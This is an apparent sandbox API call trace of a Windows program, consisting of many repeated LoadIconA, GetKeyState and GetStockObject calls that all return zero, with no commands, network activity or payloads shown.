0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.412] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.413] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.414] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.415] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.416] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.417] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.418] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.419] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.420] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.421] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.422] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.423] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.424] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.424] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.428] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.429] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.430] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.431] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.432] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.433] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.434] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.434] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.434] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.434] LoadIconA (hInstance=0x0, lpIconName=0x1539) returned 0x0 [0069.436] GetKeyState (nVirtKey=1) returned 0 [0069.436] GetStretchBltMode (hdc=0x1) returned 0 [0069.436] GetStockObject (i=789644) returned 0x0 [0069.436] GetStockObject (i=789644) returned 0x0 [0069.436] GetStockObject (i=789644) returned 0x0 [0069.436] GetStockObject (i=789644) returned 0x0 [0069.436] GetStockObject (i=789644) returned 0x0 [0069.436] GetStockObject (i=789644) returned 0x0 [0069.436] GetStockObject (i=789644) returned 0x0 [0069.436] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.437] GetKeyState (nVirtKey=1) returned 0 [0069.437] GetStretchBltMode (hdc=0x1) returned 0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.437] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.438] GetKeyState (nVirtKey=1) returned 0 [0069.438] GetStretchBltMode (hdc=0x1) returned 0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.438] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.439] GetKeyState (nVirtKey=1) returned 0 [0069.439] GetStretchBltMode (hdc=0x1) returned 0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.439] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.440] GetKeyState (nVirtKey=1) returned 0 [0069.440] GetStretchBltMode (hdc=0x1) returned 0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.440] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.441] GetKeyState (nVirtKey=1) returned 0 [0069.441] GetStretchBltMode (hdc=0x1) returned 0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.441] GetStockObject (i=789644) returned 0x0 [0069.442] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.442] GetKeyState (nVirtKey=1) returned 0 [0069.442] GetStretchBltMode (hdc=0x1) returned 0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetStockObject (i=789644) returned 0x0 [0069.442] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.443] GetKeyState (nVirtKey=1) returned 0 [0069.443] GetStretchBltMode (hdc=0x1) returned 0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetStockObject (i=789644) returned 0x0 [0069.443] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.444] GetKeyState (nVirtKey=1) returned 0 [0069.444] GetStretchBltMode (hdc=0x1) returned 0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetStockObject (i=789644) returned 0x0 [0069.444] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.444] GetKeyState (nVirtKey=1) returned 0 [0069.445] GetStretchBltMode (hdc=0x1) returned 0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.445] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.445] GetKeyState (nVirtKey=1) returned 0 [0069.445] GetStretchBltMode (hdc=0x1) returned 0 [0069.445] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetListBoxInfo (hwnd=0x0) returned 0x0 [0069.446] GetKeyState (nVirtKey=1) returned 0 [0069.446] GetStretchBltMode (hdc=0x1) returned 0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.446] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetStockObject (i=789644) returned 0x0 [0069.447] GetListBoxInfo (hwnd=0x0) returned 0x0 